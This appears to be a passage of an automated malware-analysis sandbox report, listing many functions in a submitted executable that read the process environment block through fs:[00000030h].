Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2035C mov eax, dword ptr fs:[00000030h]	0_2_00F2035C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2035C mov eax, dword ptr fs:[00000030h]	0_2_00F2035C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2035C mov eax, dword ptr fs:[00000030h]	0_2_00F2035C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2035C mov ecx, dword ptr fs:[00000030h]	0_2_00F2035C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2035C mov eax, dword ptr fs:[00000030h]	0_2_00F2035C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2035C mov eax, dword ptr fs:[00000030h]	0_2_00F2035C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F22349 mov eax, dword ptr fs:[00000030h]	0_2_00F22349
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDA30B mov eax, dword ptr fs:[00000030h]	0_2_00EDA30B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDA30B mov eax, dword ptr fs:[00000030h]	0_2_00EDA30B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDA30B mov eax, dword ptr fs:[00000030h]	0_2_00EDA30B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9C310 mov ecx, dword ptr fs:[00000030h]	0_2_00E9C310
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC0310 mov ecx, dword ptr fs:[00000030h]	0_2_00EC0310
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA04E5 mov ecx, dword ptr fs:[00000030h]	0_2_00EA04E5
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA64AB mov eax, dword ptr fs:[00000030h]	0_2_00EA64AB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2A4B0 mov eax, dword ptr fs:[00000030h]	0_2_00F2A4B0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED44B0 mov ecx, dword ptr fs:[00000030h]	0_2_00ED44B0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F5A49A mov eax, dword ptr fs:[00000030h]	0_2_00F5A49A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2C460 mov ecx, dword ptr fs:[00000030h]	0_2_00F2C460
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECA470 mov eax, dword ptr fs:[00000030h]	0_2_00ECA470
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECA470 mov eax, dword ptr fs:[00000030h]	0_2_00ECA470
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECA470 mov eax, dword ptr fs:[00000030h]	0_2_00ECA470
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F5A456 mov eax, dword ptr fs:[00000030h]	0_2_00F5A456
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]	0_2_00EDE443
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]	0_2_00EDE443
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]	0_2_00EDE443
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]	0_2_00EDE443
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]	0_2_00EDE443
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]	0_2_00EDE443
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]	0_2_00EDE443
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE443 mov eax, dword ptr fs:[00000030h]	0_2_00EDE443
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9645D mov eax, dword ptr fs:[00000030h]	0_2_00E9645D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC245A mov eax, dword ptr fs:[00000030h]	0_2_00EC245A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9E420 mov eax, dword ptr fs:[00000030h]	0_2_00E9E420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9E420 mov eax, dword ptr fs:[00000030h]	0_2_00E9E420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9E420 mov eax, dword ptr fs:[00000030h]	0_2_00E9E420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00E9C427 mov eax, dword ptr fs:[00000030h]	0_2_00E9C427
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]	0_2_00F26420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]	0_2_00F26420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]	0_2_00F26420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]	0_2_00F26420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]	0_2_00F26420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]	0_2_00F26420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F26420 mov eax, dword ptr fs:[00000030h]	0_2_00F26420
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED8402 mov eax, dword ptr fs:[00000030h]	0_2_00ED8402
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED8402 mov eax, dword ptr fs:[00000030h]	0_2_00ED8402
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED8402 mov eax, dword ptr fs:[00000030h]	0_2_00ED8402
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDC5ED mov eax, dword ptr fs:[00000030h]	0_2_00EDC5ED
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDC5ED mov eax, dword ptr fs:[00000030h]	0_2_00EDC5ED
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA25E0 mov eax, dword ptr fs:[00000030h]	0_2_00EA25E0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]	0_2_00ECE5E7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]	0_2_00ECE5E7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]	0_2_00ECE5E7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]	0_2_00ECE5E7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]	0_2_00ECE5E7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]	0_2_00ECE5E7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]	0_2_00ECE5E7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE5E7 mov eax, dword ptr fs:[00000030h]	0_2_00ECE5E7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE5CF mov eax, dword ptr fs:[00000030h]	0_2_00EDE5CF
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE5CF mov eax, dword ptr fs:[00000030h]	0_2_00EDE5CF
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA65D0 mov eax, dword ptr fs:[00000030h]	0_2_00EA65D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDA5D0 mov eax, dword ptr fs:[00000030h]	0_2_00EDA5D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDA5D0 mov eax, dword ptr fs:[00000030h]	0_2_00EDA5D0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F205A7 mov eax, dword ptr fs:[00000030h]	0_2_00F205A7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F205A7 mov eax, dword ptr fs:[00000030h]	0_2_00F205A7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F205A7 mov eax, dword ptr fs:[00000030h]	0_2_00F205A7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC45B1 mov eax, dword ptr fs:[00000030h]	0_2_00EC45B1
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC45B1 mov eax, dword ptr fs:[00000030h]	0_2_00EC45B1
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED4588 mov eax, dword ptr fs:[00000030h]	0_2_00ED4588
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA2582 mov eax, dword ptr fs:[00000030h]	0_2_00EA2582
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA2582 mov ecx, dword ptr fs:[00000030h]	0_2_00EA2582
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDE59C mov eax, dword ptr fs:[00000030h]	0_2_00EDE59C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED656A mov eax, dword ptr fs:[00000030h]	0_2_00ED656A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED656A mov eax, dword ptr fs:[00000030h]	0_2_00ED656A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED656A mov eax, dword ptr fs:[00000030h]	0_2_00ED656A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA8550 mov eax, dword ptr fs:[00000030h]	0_2_00EA8550
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA8550 mov eax, dword ptr fs:[00000030h]	0_2_00EA8550
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE53E mov eax, dword ptr fs:[00000030h]	0_2_00ECE53E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE53E mov eax, dword ptr fs:[00000030h]	0_2_00ECE53E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE53E mov eax, dword ptr fs:[00000030h]	0_2_00ECE53E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE53E mov eax, dword ptr fs:[00000030h]	0_2_00ECE53E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE53E mov eax, dword ptr fs:[00000030h]	0_2_00ECE53E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]	0_2_00EB0535
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]	0_2_00EB0535
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]	0_2_00EB0535
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]	0_2_00EB0535
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]	0_2_00EB0535
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]	0_2_00EB0535
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F36500 mov eax, dword ptr fs:[00000030h]	0_2_00F36500
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]	0_2_00F74500
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]	0_2_00F74500
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]	0_2_00F74500
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]	0_2_00F74500
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]	0_2_00F74500
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]	0_2_00F74500
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]	0_2_00F74500
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E6F2 mov eax, dword ptr fs:[00000030h]	0_2_00F1E6F2
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E6F2 mov eax, dword ptr fs:[00000030h]	0_2_00F1E6F2
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E6F2 mov eax, dword ptr fs:[00000030h]	0_2_00F1E6F2
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E6F2 mov eax, dword ptr fs:[00000030h]	0_2_00F1E6F2
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F206F1 mov eax, dword ptr fs:[00000030h]	0_2_00F206F1
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F206F1 mov eax, dword ptr fs:[00000030h]	0_2_00F206F1
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDA6C7 mov ebx, dword ptr fs:[00000030h]	0_2_00EDA6C7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDA6C7 mov eax, dword ptr fs:[00000030h]	0_2_00EDA6C7
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDC6A6 mov eax, dword ptr fs:[00000030h]	0_2_00EDC6A6
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED66B0 mov eax, dword ptr fs:[00000030h]	0_2_00ED66B0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA4690 mov eax, dword ptr fs:[00000030h]	0_2_00EA4690
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA4690 mov eax, dword ptr fs:[00000030h]	0_2_00EA4690
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDA660 mov eax, dword ptr fs:[00000030h]	0_2_00EDA660
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDA660 mov eax, dword ptr fs:[00000030h]	0_2_00EDA660
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6866E mov eax, dword ptr fs:[00000030h]	0_2_00F6866E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6866E mov eax, dword ptr fs:[00000030h]	0_2_00F6866E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED2674 mov eax, dword ptr fs:[00000030h]	0_2_00ED2674
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBC640 mov eax, dword ptr fs:[00000030h]	0_2_00EBC640
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA262C mov eax, dword ptr fs:[00000030h]	0_2_00EA262C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EBE627 mov eax, dword ptr fs:[00000030h]	0_2_00EBE627
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED6620 mov eax, dword ptr fs:[00000030h]	0_2_00ED6620
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED8620 mov eax, dword ptr fs:[00000030h]	0_2_00ED8620
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]	0_2_00EB260B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]	0_2_00EB260B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]	0_2_00EB260B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]	0_2_00EB260B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]	0_2_00EB260B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]	0_2_00EB260B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]	0_2_00EB260B
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2619 mov eax, dword ptr fs:[00000030h]	0_2_00EE2619
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1E609 mov eax, dword ptr fs:[00000030h]	0_2_00F1E609
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC27ED mov eax, dword ptr fs:[00000030h]	0_2_00EC27ED
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC27ED mov eax, dword ptr fs:[00000030h]	0_2_00EC27ED
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC27ED mov eax, dword ptr fs:[00000030h]	0_2_00EC27ED
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA47FB mov eax, dword ptr fs:[00000030h]	0_2_00EA47FB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA47FB mov eax, dword ptr fs:[00000030h]	0_2_00EA47FB
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2E7E1 mov eax, dword ptr fs:[00000030h]	0_2_00F2E7E1
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EAC7C0 mov eax, dword ptr fs:[00000030h]	0_2_00EAC7C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F207C3 mov eax, dword ptr fs:[00000030h]	0_2_00F207C3
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA07AF mov eax, dword ptr fs:[00000030h]	0_2_00EA07AF
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F547A0 mov eax, dword ptr fs:[00000030h]	0_2_00F547A0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4678E mov eax, dword ptr fs:[00000030h]	0_2_00F4678E
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA8770 mov eax, dword ptr fs:[00000030h]	0_2_00EA8770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]	0_2_00EB0770
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED674D mov esi, dword ptr fs:[00000030h]	0_2_00ED674D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED674D mov eax, dword ptr fs:[00000030h]	0_2_00ED674D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED674D mov eax, dword ptr fs:[00000030h]	0_2_00ED674D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F24755 mov eax, dword ptr fs:[00000030h]	0_2_00F24755
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2E75D mov eax, dword ptr fs:[00000030h]	0_2_00F2E75D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA0750 mov eax, dword ptr fs:[00000030h]	0_2_00EA0750
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2750 mov eax, dword ptr fs:[00000030h]	0_2_00EE2750
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EE2750 mov eax, dword ptr fs:[00000030h]	0_2_00EE2750
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F1C730 mov eax, dword ptr fs:[00000030h]	0_2_00F1C730
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDC720 mov eax, dword ptr fs:[00000030h]	0_2_00EDC720
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDC720 mov eax, dword ptr fs:[00000030h]	0_2_00EDC720
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED273C mov eax, dword ptr fs:[00000030h]	0_2_00ED273C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED273C mov ecx, dword ptr fs:[00000030h]	0_2_00ED273C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED273C mov eax, dword ptr fs:[00000030h]	0_2_00ED273C
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDC700 mov eax, dword ptr fs:[00000030h]	0_2_00EDC700
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA0710 mov eax, dword ptr fs:[00000030h]	0_2_00EA0710
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED0710 mov eax, dword ptr fs:[00000030h]	0_2_00ED0710
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F6A8E4 mov eax, dword ptr fs:[00000030h]	0_2_00F6A8E4
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDC8F9 mov eax, dword ptr fs:[00000030h]	0_2_00EDC8F9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EDC8F9 mov eax, dword ptr fs:[00000030h]	0_2_00EDC8F9
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ECE8C0 mov eax, dword ptr fs:[00000030h]	0_2_00ECE8C0
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA0887 mov eax, dword ptr fs:[00000030h]	0_2_00EA0887
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2C89D mov eax, dword ptr fs:[00000030h]	0_2_00F2C89D
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2E872 mov eax, dword ptr fs:[00000030h]	0_2_00F2E872
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F2E872 mov eax, dword ptr fs:[00000030h]	0_2_00F2E872
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F36870 mov eax, dword ptr fs:[00000030h]	0_2_00F36870
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F36870 mov eax, dword ptr fs:[00000030h]	0_2_00F36870
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EB2840 mov ecx, dword ptr fs:[00000030h]	0_2_00EB2840
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA4859 mov eax, dword ptr fs:[00000030h]	0_2_00EA4859
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EA4859 mov eax, dword ptr fs:[00000030h]	0_2_00EA4859
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00ED0854 mov eax, dword ptr fs:[00000030h]	0_2_00ED0854
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4483A mov eax, dword ptr fs:[00000030h]	0_2_00F4483A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00F4483A mov eax, dword ptr fs:[00000030h]	0_2_00F4483A
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC2835 mov eax, dword ptr fs:[00000030h]	0_2_00EC2835
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC2835 mov eax, dword ptr fs:[00000030h]	0_2_00EC2835
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC2835 mov eax, dword ptr fs:[00000030h]	0_2_00EC2835
Source: C:\Users\user\Desktop\alWUxZvrvU.exe	Code function: 0_2_00EC2835 mov ecx, dword ptr fs:[00000030h]	0_2_00EC2835
